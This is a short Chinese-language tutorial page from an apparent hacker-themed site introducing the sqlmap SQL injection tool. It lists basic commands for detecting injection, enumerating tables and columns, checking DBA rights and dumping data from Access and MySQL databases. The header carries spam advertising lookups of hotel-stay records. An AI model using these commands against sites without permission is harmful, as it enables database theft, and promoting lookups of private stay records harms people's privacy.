首页 > 黑客工具黑客工具

Sqlmap黑客工具的使用

2021-02-06 23:41 来源:5dcn.cn | 作者:免费黑客网  点击数:
. 黑客 我的黑客 黑客交流 黑客学习 黑客技术 开房网 查开房我帮你 查开放 51免费查开放房 开房数据查询
Sqlmap黑客工具的使用

一、sqlmap黑客工具:

其实,黑客工具是很多的,上一篇文章也提到了一些简单的黑客工具列表,今天来说说sqlmap黑客工具的使用!sqlmap是一个开源工具,可自动检测和利用SQL注入漏洞和接管数据库服务器的过程。它包括一个功能强大的检测引擎,许多利基特征为终端渗透测试者和广泛的交换机持续从数据库指纹,数据从数据库提取,访问底层文件系统,并通过操作系统执行命令带间连接。sqlmap是一个开源渗透测试工具,它具有强大的检测引擎,同时有众多功能,包括数据库指纹识别、完全支持MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase,SAP MaxDB,HSQLDB和Informix数据库管理系统。完全支持6种SQL注入技术,这些技术是基于布尔的盲人,基于时间的盲人,基于错误的,基于UNION查询的,堆叠的查询和带外的。

二、sqlmap黑客工具官方网站(http://sqlmap.org)下载:

三、sqlmap工具使用方法:

1,需要在启动电脑上安装python环境

2,在安装目录下,启动cmd窗口,然后调用python运行

四、sqlmap工具具体怎么使用?

 

1、注入access数据库常用的参数

sqlmap.py -u "url"  //判断参数是否存在注入

sqlmap.py -u "url" --tables //猜解表名

sqlmap.py -u "url" --columns -T "要猜解的表名"  //猜解列名

sqlmap.py -u "url" --dump -C "列名" -T “表名”  //爆出字段数据

2、注入MySQL数据库常用参数

sqlmap.py -u "url"  //判断参数是否存在注入

sqlmap.py -u "url" --current-db  //查看网站当前数据库

sqlmap.py -u "url" --is-dba  //查看当前用户权限

sqlmap.py -u "url" --tables //猜解表名

sqlmap.py -u "url" --columns -T "要猜解的表名"  //猜解列名

sqlmap.py -u "url" --dump -C "列名" -T “表名”  //爆出字段数据

 

Copyright © 2021 我的黑客交流网站:5dcn.cn